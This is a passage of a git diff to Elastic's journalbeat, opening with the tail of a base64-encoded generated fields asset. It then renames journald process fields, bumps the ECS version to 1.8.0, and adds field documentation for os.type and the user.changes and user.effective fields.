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" } diff --git a/journalbeat/_meta/fields.common.yml b/journalbeat/_meta/fields.common.yml index e03a20eb6917..113b2a4e5f48 100644 --- a/journalbeat/_meta/fields.common.yml +++ b/journalbeat/_meta/fields.common.yml @@ -43,19 +43,19 @@ example: 3 description: > The audit session of the object process. - - name: cmd + - name: process.command_line type: keyword required: false example: "/lib/systemd/systemd --user" description: > The command line of the process. - - name: name + - name: process.name type: keyword required: false example: "/lib/systemd/systemd" description: > Name of the executable. - - name: executable + - name: process.executable type: keyword required: false description: > @@ -176,7 +176,7 @@ example: 3 description: > The audit session of the source process. - - name: cmd + - name: command_line type: keyword required: false example: "/lib/systemd/systemd --user" diff --git a/journalbeat/cmd/root.go b/journalbeat/cmd/root.go index 7f5b973cb7c7..50ded0ee692f 100644 --- a/journalbeat/cmd/root.go +++ b/journalbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "journalbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/journalbeat/docs/fields.asciidoc b/journalbeat/docs/fields.asciidoc index 969c69c0cab5..7ca5f4bc7753 100644 --- a/journalbeat/docs/fields.asciidoc +++ b/journalbeat/docs/fields.asciidoc @@ -251,7 +251,7 @@ required: False -- -*`journald.object.cmd`*:: +*`journald.object.process.command_line`*:: + -- The command line of the process. @@ -265,7 +265,7 @@ required: False -- -*`journald.object.name`*:: +*`journald.object.process.name`*:: + -- Name of the executable. @@ -279,7 +279,7 @@ required: False -- -*`journald.object.executable`*:: +*`journald.object.process.executable`*:: + -- Path to the the executable. @@ -542,7 +542,7 @@ required: False -- -*`journald.process.cmd`*:: +*`journald.process.command_line`*:: + -- The command line of the process. @@ -2738,7 +2738,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2791,7 +2791,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3982,6 +3982,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -5056,6 +5069,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -5226,6 +5252,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -8377,6 +8416,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -8552,6 +8592,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -8562,6 +8715,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + 